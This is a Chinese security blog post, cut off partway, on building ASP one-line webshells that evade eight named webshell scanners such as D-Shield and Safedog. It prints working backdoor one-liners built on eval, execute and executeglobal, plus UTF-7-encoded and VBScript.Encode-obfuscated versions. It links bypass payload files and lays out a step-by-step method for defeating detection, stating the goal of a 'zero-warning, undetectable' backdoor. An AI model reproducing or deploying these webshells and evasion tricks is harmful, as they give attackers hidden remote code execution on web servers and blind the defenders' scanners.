构造免杀的asp一句话木马

Track-聂风   ·   发表于 2018-05-28 10:40:57   ·   漏洞文章
<div id="topic_content" class="topic-content markdown-body" style="text-size-adjust: 100%; color: rgb(51, 51, 51); overflow: hidden; font-family: "Monospaced Number", "Chinese Quote", -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 15px; line-height: 24px; word-wrap: break-word; min-height: 40px; letter-spacing: 0.05em;"><h3 id="toc-0" style="margin-top: 1em; margin-bottom: 16px; font-family: inherit; font-weight: bold; line-height: 1.43; color: inherit; text-rendering: optimizeLegibility; font-size: 20px; box-sizing: border-box; position: relative;">0x00：前言</h3><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;">随着时间的推移和其它新型动态网页技术的兴起，使用ASP(Active Server Page)技术构建的Web应用越来越少。ASP的衰落、旧资料和链接的失效、前辈们早期对ASP较多的研究，都导致了新型ASP网站后门和技术研究的减少。</p><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;">本篇文章主要梳理ASP一句话Webshell的构建和规避检测软件达到源文件免杀的思路。最终构建能够同时绕过以下表格中8个专业木马查杀工具和平台检测的Webshell，构造出零提示、无警告、无法被检测到的ASP一句话木马后门。</p><table style="max-width: 100%; background-color: transparent; border-spacing: 0px; box-sizing: border-box; margin-top: 0px; margin-bottom: 24px; display: block; width: 770px; overflow: auto; word-break: keep-all;"><thead style="box-sizing: border-box;"><tr style="box-sizing: border-box; border-top: 1px solid rgb(204, 204, 204);"><th style="box-sizing: border-box; padding: 6px 13px; border: 1px solid rgb(221, 221, 221);">编号</th><th style="box-sizing: border-box; padding: 6px 13px; border: 1px solid rgb(221, 221, 221);">名称</th><th style="box-sizing: border-box; padding: 6px 13px; border: 1px solid rgb(221, 221, 221);">参考链接</th></tr></thead><tbody style="box-sizing: border-box;"><tr style="box-sizing: border-box; border-top: 1px solid rgb(204, 204, 204);"><td style="box-sizing: border-box; padding: 6px 13px;">1</td><td style="box-sizing: border-box; padding: 6px 13px;">网站<strong style="box-sizing: border-box;">安全狗</strong>(IIS 4.0)</td><td style="box-sizing: border-box; padding: 6px 13px;"><a href="http://download.safedog.cn/download/software/safedogIISV4.0.exe" target="_blank" style="color: rgb(65, 131, 196); box-sizing: border-box; background: transparent;">http://download.safedog.cn/download/software/safedogIISV4.0.exe</a></td></tr><tr style="box-sizing: border-box; background-color: rgb(248, 248, 248); border-top: 1px solid rgb(204, 204, 204);"><td style="box-sizing: border-box; padding: 6px 13px;">2</td><td style="box-sizing: border-box; padding: 6px 13px;"><strong style="box-sizing: border-box;">D盾Web查杀</strong>&nbsp;V2.0.9</td><td style="box-sizing: border-box; padding: 6px 13px;"><a href="http://www.d99net.net/down/WebShellKill_V2.0.9.zip" target="_blank" style="color: rgb(65, 131, 196); box-sizing: border-box; background: transparent;">http://www.d99net.net/down/WebShellKill_V2.0.9.zip</a></td></tr><tr style="box-sizing: border-box; border-top: 1px solid rgb(204, 204, 204);"><td style="box-sizing: border-box; padding: 6px 13px;">3</td><td style="box-sizing: border-box; padding: 6px 13px;"><strong style="box-sizing: border-box;">D盾防火墙</strong>&nbsp;v2.0.6.92</td><td style="box-sizing: border-box; padding: 6px 13px;"><a href="http://www.d99net.net/down/d_safe_2.0.6.92.zip" target="_blank" style="color: rgb(65, 131, 196); box-sizing: border-box; background: transparent;">http://www.d99net.net/down/d_safe_2.0.6.92.zip</a></td></tr><tr style="box-sizing: border-box; background-color: rgb(248, 248, 248); border-top: 1px solid rgb(204, 204, 204);"><td style="box-sizing: border-box; padding: 6px 13px;">4</td><td style="box-sizing: border-box; padding: 6px 13px;"><strong style="box-sizing: border-box;">深信服</strong>WebShellKillerTool(2017)</td><td style="box-sizing: border-box; padding: 6px 13px;"><a href="http://edr.sangfor.com.cn/tool/WebShellKillerTool.zip" target="_blank" style="color: rgb(65, 131, 196); box-sizing: border-box; background: transparent;">http://edr.sangfor.com.cn/tool/WebShellKillerTool.zip</a></td></tr><tr style="box-sizing: border-box; border-top: 1px solid rgb(204, 204, 204);"><td style="box-sizing: border-box; padding: 6px 13px;">5</td><td style="box-sizing: border-box; padding: 6px 13px;"><strong style="box-sizing: border-box;">360主机卫士</strong>v2.0.5.9</td><td style="box-sizing: border-box; padding: 6px 13px;"><a href="http://down-www.newasp.net/pcdown/soft/dys/360WebSafe_Setup.rar" target="_blank" style="color: rgb(65, 131, 196); box-sizing: border-box; background: transparent;">http://down-www.newasp.net/pcdown/soft/dys/360WebSafe_Setup.rar</a></td></tr><tr style="box-sizing: border-box; background-color: rgb(248, 248, 248); border-top: 1px solid rgb(204, 204, 204);"><td style="box-sizing: border-box; padding: 6px 13px;">6</td><td style="box-sizing: border-box; padding: 6px 13px;"><strong style="box-sizing: border-box;">护卫神</strong>云查杀系统(V4.5)</td><td style="box-sizing: border-box; padding: 6px 13px;"><a href="http://down.huweishen.com/free/HwsKill.zip" target="_blank" style="color: rgb(65, 131, 196); box-sizing: border-box; background: transparent;">http://down.huweishen.com/free/HwsKill.zip</a></td></tr><tr style="box-sizing: border-box; border-top: 1px solid rgb(204, 204, 204);"><td style="box-sizing: border-box; padding: 6px 13px;">7</td><td style="box-sizing: border-box; padding: 6px 13px;"><strong style="box-sizing: border-box;">OpenRASP</strong>&nbsp;WEBDIR+ Webshell检测</td><td style="box-sizing: border-box; padding: 6px 13px;"><a href="https://scanner.baidu.com/" target="_blank" style="color: rgb(65, 131, 196); box-sizing: border-box; background: transparent;">https://scanner.baidu.com</a></td></tr><tr style="box-sizing: border-box; background-color: rgb(248, 248, 248); border-top: 1px solid rgb(204, 204, 204);"><td style="box-sizing: border-box; padding: 6px 13px;">8</td><td style="box-sizing: border-box; padding: 6px 13px;"><strong style="box-sizing: border-box;">河马专业版</strong>查杀Webshell</td><td style="box-sizing: border-box; padding: 6px 13px;"><a href="http://n.shellpub.com/" target="_blank" style="color: rgb(65, 131, 196); box-sizing: border-box; background: transparent;">http://n.shellpub.com/</a></td></tr></tbody></table><h3 id="toc-1" style="margin-top: 1em; margin-bottom: 16px; font-family: inherit; font-weight: bold; line-height: 1.43; color: inherit; text-rendering: optimizeLegibility; font-size: 20px; box-sizing: border-box; position: relative;">0x01：ASP执行流程和原理</h3><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;">ASP脚本原生支持通过<strong style="box-sizing: border-box;">VBScript</strong>和<strong style="box-sizing: border-box;">JScript</strong>两种脚本语言来建立动态页面，本质上是将PC端的脚本执行能力迁移到了服务器。使用ASP技术构建的网站，通常都是部署在IIS或PWS服务器上。</p><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;">借用一个简图表示浏览器请求一个ASP脚本的流程：</p><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;"><a id="img0" href="https://xzfile.aliyuncs.com/media/upload/picture/20180525204729-c8b6e88e-6019-1.png" style="color: rgb(65, 131, 196); box-sizing: border-box; background: transparent;"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180525204729-c8b6e88e-6019-1.png" style="height: auto; max-width: 90%; vertical-align: middle; border: 0px; box-sizing: border-box; text-align: center; margin-left: auto; margin-right: auto; display: block; padding: 10px 0px;"/></a></p><blockquote style="padding-right: 15px; padding-left: 15px; margin-bottom: 24px; border-left: 4px solid rgb(221, 221, 221); box-sizing: border-box; color: rgb(119, 119, 119);"><p style="margin-top: 0px; margin-bottom: 0px; font-size: 17.5px; line-height: 1.25; box-sizing: border-box;">当Web应用服务器(IIS)判断出请求是访问ASP脚本后，自动通过<strong style="box-sizing: border-box;">Isapi</strong>模块调用ASP脚本的解释运行引擎<strong style="box-sizing: border-box;">asp.dll</strong>。asp.dll从文件系统或内部缓冲区中获取ASP脚本的文本内容，然后进行语法分析并解释执行。</p></blockquote><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;">如下图所示，在IIS服务器的"处理程序映射"配置中，可以设置特定路径文件的解析引擎。</p><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;"><a id="img1" href="https://xzfile.aliyuncs.com/media/upload/picture/20180525204729-c8cea3ac-6019-1.png" style="color: rgb(65, 131, 196); box-sizing: border-box; background: transparent;"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180525204729-c8cea3ac-6019-1.png" style="height: auto; max-width: 90%; vertical-align: middle; border: 0px; box-sizing: border-box; text-align: center; margin-left: auto; margin-right: auto; display: block; padding: 10px 0px;"/></a></p><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;">ASP脚本中的代码块一般被包裹在<code style="padding-top: 0.2em; padding-bottom: 0.2em; font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 12.75px; color: rgb(221, 17, 68); border-radius: 3px; white-space: nowrap; background-color: rgba(0, 0, 0, 0.04); border: 1px solid rgb(225, 225, 232); box-sizing: border-box;"><% %></code>标签中，默认以VBscript语言进行解释。除此之外，还可以使用&nbsp;<code style="padding-top: 0.2em; padding-bottom: 0.2em; font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 12.75px; color: rgb(221, 17, 68); border-radius: 3px; white-space: nowrap; background-color: rgba(0, 0, 0, 0.04); border: 1px solid rgb(225, 225, 232); box-sizing: border-box;"><%@ language="VBscript" %></code>或者</p><pre style="padding: 16px; font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 12.75px; border-radius: 3px; margin-top: 0px; margin-bottom: 24px; line-height: 1.6; word-break: break-all; word-wrap: normal; white-space: pre-wrap; background-color: rgb(247, 247, 247); border: 1px solid rgba(0, 0, 0, 0.15); box-sizing: border-box; font-variant-numeric: normal; font-variant-east-asian: normal; font-stretch: normal; overflow: auto;"><script&nbsp;language="VBScript"&nbsp;runat="server">&nbsp;some-vbscript-code&nbsp;</script></pre><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;">标签，显性的告诉服务器脚本使用VBscript语言进行解释。同理可将language指定为<code style="padding-top: 0.2em; padding-bottom: 0.2em; font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 12.75px; color: rgb(221, 17, 68); border-radius: 3px; white-space: nowrap; background-color: rgba(0, 0, 0, 0.04); border: 1px solid rgb(225, 225, 232); box-sizing: border-box;">JScript</code>，则表示用微软实现的JavaScript语言解释服务器上的ASP脚本中的代码。ASP脚本中的基本语法可参考ASP、VbScript和JScript各自的参考手册，本文不再赘述。</p><h3 id="toc-2" style="margin-top: 1em; margin-bottom: 16px; font-family: inherit; font-weight: bold; line-height: 1.43; color: inherit; text-rendering: optimizeLegibility; font-size: 20px; box-sizing: border-box; position: relative;">0x02：ASP支持的注释方式</h3><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;">ASP脚本中支持<strong style="box-sizing: border-box;">五种注释方式</strong></p><pre style="padding: 16px; font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 12.75px; border-radius: 3px; margin-top: 0px; margin-bottom: 24px; line-height: 1.6; word-break: break-all; word-wrap: normal; white-space: pre-wrap; background-color: rgb(247, 247, 247); border: 1px solid rgba(0, 0, 0, 0.15); box-sizing: border-box; font-variant-numeric: normal; font-variant-east-asian: normal; font-stretch: normal; overflow: auto;">&#39;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;单引号&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;（单行注释）
REM&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;rem+空格&nbsp;&nbsp;&nbsp;（单行注释）
//&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;双斜线&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(单行注释，VBscript，JScript可用，仅支持IIS)
<!--&nbsp;-->&nbsp;&nbsp;&nbsp;&nbsp;HTML注释符&nbsp;&nbsp;(单行注释，VBscript可用，仅支持IIS)
/*&nbsp;*/&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;多行注释符&nbsp;（多行注释，JScript可用）</pre><h3 id="toc-3" style="margin-top: 1em; margin-bottom: 16px; font-family: inherit; font-weight: bold; line-height: 1.43; color: inherit; text-rendering: optimizeLegibility; font-size: 20px; box-sizing: border-box; position: relative;">0x03：ASP一句话后门现状</h3><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;">ASP脚本中，主要用以下三个VBscript函数执行代码，也是我们构造ASP一句话木马的<strong style="box-sizing: border-box;">入口</strong>。下面是用三个函数分别构建对应长度最短的密码为<code style="padding-top: 0.2em; padding-bottom: 0.2em; font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 12.75px; color: rgb(221, 17, 68); border-radius: 3px; white-space: nowrap; background-color: rgba(0, 0, 0, 0.04); border: 1px solid rgb(225, 225, 232); box-sizing: border-box;">0</code>的ASP一句话后门示例：</p><ul style="padding: 0px 0px 0px 2em; margin-bottom: 24px; box-sizing: border-box;"><li style="line-height: 26px; box-sizing: border-box;"><p style="margin-top: 16px; margin-bottom: 24px; box-sizing: border-box;">Eval</p><p style="margin-top: 16px; margin-bottom: 24px; box-sizing: border-box;"><code style="padding-top: 0.2em; padding-bottom: 0.2em; font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 12.75px; color: rgb(221, 17, 68); border-radius: 3px; white-space: nowrap; background-color: rgba(0, 0, 0, 0.04); border: 1px solid rgb(225, 225, 232); box-sizing: border-box;"><%eVAl reQuEst(0)%></code></p></li><li style="line-height: 26px; box-sizing: border-box;"><p style="margin-top: 16px; margin-bottom: 24px; box-sizing: border-box;">Execute</p><p style="margin-top: 16px; margin-bottom: 24px; box-sizing: border-box;"><code style="padding-top: 0.2em; padding-bottom: 0.2em; font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 12.75px; color: rgb(221, 17, 68); border-radius: 3px; white-space: nowrap; background-color: rgba(0, 0, 0, 0.04); border: 1px solid rgb(225, 225, 232); box-sizing: border-box;"><%exECuTe ReqUEst(0)%></code></p></li><li style="line-height: 26px; box-sizing: border-box;"><p style="margin-top: 16px; margin-bottom: 24px; box-sizing: border-box;">ExecuteGlobal</p><p style="margin-top: 16px; margin-bottom: 24px; box-sizing: border-box;"><code style="padding-top: 0.2em; padding-bottom: 0.2em; font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 12.75px; color: rgb(221, 17, 68); border-radius: 3px; white-space: nowrap; background-color: rgba(0, 0, 0, 0.04); border: 1px solid rgb(225, 225, 232); box-sizing: border-box;"><%eXECutegLobaL rEquEst(0)%></code></p></li></ul><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;">遗憾的是VBscript语言和其它高级语言相比，语法结构偏向简单。代码层面上很难隐藏上面三个函数的敏感词<code style="padding-top: 0.2em; padding-bottom: 0.2em; font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 12.75px; color: rgb(221, 17, 68); border-radius: 3px; white-space: nowrap; background-color: rgba(0, 0, 0, 0.04); border: 1px solid rgb(225, 225, 232); box-sizing: border-box;">Eval</code>、<code style="padding-top: 0.2em; padding-bottom: 0.2em; font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 12.75px; color: rgb(221, 17, 68); border-radius: 3px; white-space: nowrap; background-color: rgba(0, 0, 0, 0.04); border: 1px solid rgb(225, 225, 232); box-sizing: border-box;">Execute</code>和<code style="padding-top: 0.2em; padding-bottom: 0.2em; font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 12.75px; color: rgb(221, 17, 68); border-radius: 3px; white-space: nowrap; background-color: rgba(0, 0, 0, 0.04); border: 1px solid rgb(225, 225, 232); box-sizing: border-box;">ExecuteGlobal</code>&nbsp;。</p><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;">目前用的较多的隐藏以上三个敏感词的两种方式如下：</p><ul style="padding: 0px 0px 0px 2em; margin-bottom: 24px; box-sizing: border-box;"><li style="line-height: 26px; box-sizing: border-box;"><p style="margin-top: 16px; margin-bottom: 24px; box-sizing: border-box;"><strong style="box-sizing: border-box;">使用UTF-7编码脚本</strong></p><p style="margin-top: 16px; margin-bottom: 24px; box-sizing: border-box;">一个密码为"LandGrey"的原始ASP一句话脚本代码如下：</p><pre style="padding: 16px; font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 12.75px; border-radius: 3px; margin-top: 0px; margin-bottom: 24px; line-height: 1.6; word-break: break-all; word-wrap: normal; white-space: pre-wrap; background-color: rgb(247, 247, 247); border: 1px solid rgba(0, 0, 0, 0.15); box-sizing: border-box; font-variant-numeric: normal; font-variant-east-asian: normal; font-stretch: normal; overflow: auto;"><%<span class="label label-primary">@codepage=65000%</span>>
<%response.codepage=65001:eval(request("LandGrey"))%></pre><p style="margin-top: 16px; margin-bottom: 24px; box-sizing: border-box;">UTF-7编码后<a href="https://github.com/LandGrey/webshell-detect-bypass/blob/master/webshell/asp/utf7-bypass.asp" target="_blank" style="color: rgb(65, 131, 196); box-sizing: border-box; background: transparent;">utf7-bypass.asp</a>脚本内容如下：</p><pre style="padding: 16px; font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 12.75px; border-radius: 3px; margin-top: 0px; margin-bottom: 24px; line-height: 1.6; word-break: break-all; word-wrap: normal; white-space: pre-wrap; background-color: rgb(247, 247, 247); border: 1px solid rgba(0, 0, 0, 0.15); box-sizing: border-box; font-variant-numeric: normal; font-variant-east-asian: normal; font-stretch: normal; overflow: auto;"><%<span class="label label-primary">@codepage=65000%</span>>
<%
+AHIAZQBzAHAAbwBuAHMAZQAuAGMAbwBkAGUAcABhAGcAZQA9ADYANQAwADAAMQA6AGUAdgBhAGwAKAByAGUAcQB1AGUAcwB0ACgAIgBMAGEAbgBkAEcAcgBlAHkAIgApACk-
%></pre><p style="margin-top: 16px; margin-bottom: 24px; box-sizing: border-box;">这种方式可以<strong style="box-sizing: border-box;">躲过较多webshell检测软件查杀</strong>，但是D盾Webshell查杀工具，提示脚本使用了UTF-7编码，并不能做到完全不被察觉。</p></li></ul><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;"><a id="img2" href="https://xzfile.aliyuncs.com/media/upload/picture/20180525204729-c8dcf83a-6019-1.png" style="color: rgb(65, 131, 196); box-sizing: border-box; background: transparent;"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180525204729-c8dcf83a-6019-1.png" style="height: auto; max-width: 90%; vertical-align: middle; border: 0px; box-sizing: border-box; text-align: center; margin-left: auto; margin-right: auto; display: block; padding: 10px 0px;"/></a></p><ul style="padding: 0px 0px 0px 2em; margin-bottom: 24px; box-sizing: border-box;"><li style="line-height: 26px; box-sizing: border-box;"><p style="margin-top: 16px; margin-bottom: 24px; box-sizing: border-box;"><strong style="box-sizing: border-box;">使用VBScript.Encode功能编码脚本</strong></p><p style="margin-top: 16px; margin-bottom: 24px; box-sizing: border-box;">ASP脚本默认可以使用内置的Encoder工具，对代码进行混淆，以保护源码的安全性。写一个vbs脚本，内容如下：</p><pre style="padding: 16px; font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 12.75px; border-radius: 3px; margin-top: 0px; margin-bottom: 24px; line-height: 1.6; word-break: break-all; word-wrap: normal; white-space: pre-wrap; background-color: rgb(247, 247, 247); border: 1px solid rgba(0, 0, 0, 0.15); box-sizing: border-box; font-variant-numeric: normal; font-variant-east-asian: normal; font-stretch: normal; overflow: auto;">ExecuteGlobal&nbsp;request("LandGrey")</pre><p style="margin-top: 16px; margin-bottom: 24px; box-sizing: border-box;">使用微软的工具运行命令<code style="padding-top: 0.2em; padding-bottom: 0.2em; font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 12.75px; color: rgb(221, 17, 68); border-radius: 3px; white-space: nowrap; background-color: rgba(0, 0, 0, 0.04); border: 1px solid rgb(225, 225, 232); box-sizing: border-box;">screnc.exe script.vbs script.vbe</code>，得到结果</p><pre style="padding: 16px; font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 12.75px; border-radius: 3px; margin-top: 0px; margin-bottom: 24px; line-height: 1.6; word-break: break-all; word-wrap: normal; white-space: pre-wrap; background-color: rgb(247, 247, 247); border: 1px solid rgba(0, 0, 0, 0.15); box-sizing: border-box; font-variant-numeric: normal; font-variant-east-asian: normal; font-stretch: normal; overflow: auto;">#<span class="label label-primary">@~^IQAAAA==3X+^!YMVK4msPM+5E/OcrSl</span>&nbsp;[MM+Xrb+AsAAA==^#~@</pre><p style="margin-top: 16px; margin-bottom: 24px; box-sizing: border-box;">然后就可以构建一个密码为"LandGrey"的编码混淆后的一句话木马脚本。注意里面有不可打印字符，需要使用的话，请下载<a href="https://github.com/LandGrey/webshell-detect-bypass/blob/master/webshell/asp/vbencode-bypass.asp" target="_blank" style="color: rgb(65, 131, 196); box-sizing: border-box; background: transparent;">vbencode-bypass.asp</a></p><pre style="padding: 16px; font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 12.75px; border-radius: 3px; margin-top: 0px; margin-bottom: 24px; line-height: 1.6; word-break: break-all; word-wrap: normal; white-space: pre-wrap; background-color: rgb(247, 247, 247); border: 1px solid rgba(0, 0, 0, 0.15); box-sizing: border-box; font-variant-numeric: normal; font-variant-east-asian: normal; font-stretch: normal; overflow: auto;"><%@&nbsp;LANGUAGE&nbsp;=&nbsp;"VBScript.Encode"%>
<%#<span class="label label-primary">@~^IQAAAA==3X+^!YMVK4msPM+5E/OcrSl</span>&nbsp;&nbsp;&nbsp;[MM+Xrb+AsAAA==^#~<span class="label label-primary">@%</span>></pre><p style="margin-top: 16px; margin-bottom: 24px; box-sizing: border-box;">这种方式也可以绕过较多的查杀工具，但D盾会解码混淆后的脚本，然后再判断是否是恶意脚本，构造出来的一句话脚本木马依然会被查杀。</p></li></ul><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;">接着就陷入了较长时间的进度停滞，堆积各种代码姿势和测试已经公开的一句话木马，均不能躲过"<strong style="box-sizing: border-box;">D盾</strong>"的毒手。</p><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;">期间人工测试了大量代码，也试图通过fuzzing，来构造<code style="padding-top: 0.2em; padding-bottom: 0.2em; font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 12.75px; color: rgb(221, 17, 68); border-radius: 3px; white-space: nowrap; background-color: rgba(0, 0, 0, 0.04); border: 1px solid rgb(225, 225, 232); box-sizing: border-box;">eval{some-char}RequEst("LandGrey")</code>形式的代码，尝试找到可以连接在eval和request之间的特殊字符，让ASP引擎既能正常解析脚本，又能绕过软件检测，结果失败了。</p><h3 id="toc-4" style="margin-top: 1em; margin-bottom: 16px; font-family: inherit; font-weight: bold; line-height: 1.43; color: inherit; text-rendering: optimizeLegibility; font-size: 20px; box-sizing: border-box; position: relative;">0x04：研究思路梳理</h3><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;">从以上小节的相关介绍可以看出目前构造完全免杀的ASP一句话木马的主要困难点：</p><ul style="padding: 0px 0px 0px 2em; margin-bottom: 24px; box-sizing: border-box;"><li style="line-height: 26px; box-sizing: border-box;">ASP网页构建技术出现时间较早，相关技术较为成熟</li><li style="line-height: 26px; box-sizing: border-box;">难找到以往从没出现过的新型技术构建一句话木马</li><li style="line-height: 26px; box-sizing: border-box;">构建ASP网页相关的语法结构偏向简单</li><li style="line-height: 26px; box-sizing: border-box;">ASP Webshell被限定在仅使用一个ASP脚本，构造一句话木马</li><li style="line-height: 26px; box-sizing: border-box;">各种成熟的Webshell查杀工具对以往各类一句话木马均有所防范</li></ul><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;">要成功构造出能同时绕过以上表格中8款Webshell检测工具和平台的ASP一句话木马，存在一定的困难，不梳理下构造思路，最终很可能会做无用功。</p><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;">虽然如此，但是现在研究构造免杀的ASP一句话木马也存在一定的有利条件：</p><ul style="padding: 0px 0px 0px 2em; margin-bottom: 24px; box-sizing: border-box;"><li style="line-height: 26px; box-sizing: border-box;">ASP构建的Web应用的减少直接导致查杀软件对<strong style="box-sizing: border-box;">ASP木马查杀的重视程度降低</strong></li><li style="line-height: 26px; box-sizing: border-box;">针对ASP木马的查杀技术还停留在<strong style="box-sizing: border-box;">正则表达式特征匹配</strong>方面</li><li style="line-height: 26px; box-sizing: border-box;">大多数Webshell检测工具的<strong style="box-sizing: border-box;">ASP特征库版本很久没有更新</strong>了</li></ul><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;">想要绕过检测，可以进行以下操作</p><ol style="padding: 0px 0px 0px 2em; margin-bottom: 24px; box-sizing: border-box;"><li style="line-height: 26px; box-sizing: border-box;">先收集以往的各种ASP一句话木马样本</li><li style="line-height: 26px; box-sizing: border-box;">多使用几种最新版的本地查杀工具进行<strong style="box-sizing: border-box;">断网检测</strong>，交叉验证，比对查杀情况</li><li style="line-height: 26px; box-sizing: border-box;">针对所有的ASP一句话木马样本使用的技术进行简单分类</li><li style="line-height: 26px; box-sizing: border-box;">重点分析能侥幸绕过一两款工具的单个木马样本</li><li style="line-height: 26px; box-sizing: border-box;">熟读语法手册和官方文档和原木马样本，不断增删代码，找到绕过检测的"命脉"</li><li style="line-height: 26px; box-sizing: border-box;">结合木马所使用的技术方法进行Webshell语法特性方面的深入挖掘</li><li style="line-height: 26px; box-sizing: border-box;">找到目前已知所有可以执行ASP代码或命令的函数或语法特性，进行相关拓展或替换</li><li style="line-height: 26px; box-sizing: border-box;">针对单个查杀效果较好的本地工具，不断进行手工测试绕过，必要时辅助Fuzzing技术</li></ol><h3 id="toc-5" style="margin-top: 1em; margin-bottom: 16px; font-family: inherit; font-weight: bold; line-height: 1.43; color: inherit; text-rendering: optimizeLegibility; font-size: 20px; box-sizing: border-box; position: relative;">0x05：绕过D盾检测</h3><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;">上面介绍了，既然D盾规则库比较全，那就先从突破<strong style="box-sizing: border-box;">D盾Web查杀</strong>工具开始。</p><h4 id="toc-6" style="margin-top: 1em; margin-bottom: 16px; font-family: inherit; font-weight: bold; line-height: 1.4; color: inherit; text-rendering: optimizeLegibility; font-size: 18px; box-sizing: border-box; position: relative;">一. 填充垃圾数据插入特殊字符串绕过</h4><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;">经过0x03小节的分析和大量测试，我不仅怀疑现在是否还能找到仅通过单个脚本，就能构造出绕过D盾Webshell查杀的ASP一句话木马。直到我偶然发现下面代码中一个有趣的地方：</p><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;"><a id="img3" href="https://xzfile.aliyuncs.com/media/upload/picture/20180525204729-c8e92d76-6019-1.png" style="color: rgb(65, 131, 196); box-sizing: border-box; background: transparent;"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180525204729-c8e92d76-6019-1.png" style="height: auto; max-width: 90%; vertical-align: middle; border: 0px; box-sizing: border-box; text-align: center; margin-left: auto; margin-right: auto; display: block; padding: 10px 0px;"/></a></p><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;">第二行代码用单引号注释掉了<code style="padding-top: 0.2em; padding-bottom: 0.2em; font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 12.75px; color: rgb(221, 17, 68); border-radius: 3px; white-space: nowrap; background-color: rgba(0, 0, 0, 0.04); border: 1px solid rgb(225, 225, 232); box-sizing: border-box;">%></code>符号，按理来说，对脚本的执行并没有影响。但是发现如下图，ASP引擎忽略了单引号注释符，将脚本中第一个<code style="padding-top: 0.2em; padding-bottom: 0.2em; font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 12.75px; color: rgb(221, 17, 68); border-radius: 3px; white-space: nowrap; background-color: rgba(0, 0, 0, 0.04); border: 1px solid rgb(225, 225, 232); box-sizing: border-box;">%></code>以后的字符全部截断，而且同时D盾也查不出来脚本有异常了。</p><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;"><a id="img4" href="https://xzfile.aliyuncs.com/media/upload/picture/20180525204729-c8ff3a6c-6019-1.png" style="color: rgb(65, 131, 196); box-sizing: border-box; background: transparent;"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180525204729-c8ff3a6c-6019-1.png" style="height: auto; max-width: 90%; vertical-align: middle; border: 0px; box-sizing: border-box; text-align: center; margin-left: auto; margin-right: auto; display: block; padding: 10px 0px;"/></a></p><p style="margin-top: 0px; margin-bottom: 24px; box-sizing: border-box;">ASP引擎和D盾的解析如此相似，内部实现可以看成进入<code style="padding-top: 0.2em; padding-bottom: 0.2em; font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 12.75px; color: rgb(221, 17, 68); border-radius: 3px; white-space: nowrap; background-color: rgba(0, 0, 0, 0.04); border: 1px solid rgb(225, 225, 232); box-sizing: border-box;"><%</code>符号时，就急于寻找<code style="padding-top: 0.2em; padding-bottom: 0.2em; font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 12.75px; color: rgb(221, 17, 68); border-radius: 3px; white-space: nowrap; background-color: rgba(0, 0, 0, 0.04); border: 1px solid rgb(225, 225, 232); box-sizing: border-box;">%></code>符号闭合这段代码，而造成忽略单引号注释符和造成代码截断的情况。以此为突破口，人肉fuzzing，终于找到绕过D盾，但可以让ASP引擎解析的一段代码<a href="https://github.com/LandGrey/webshell-detect-bypass/blob/master/webshell/asp/glorysday.asp" target="_blank" style="color: rgb(65, 131, 196); 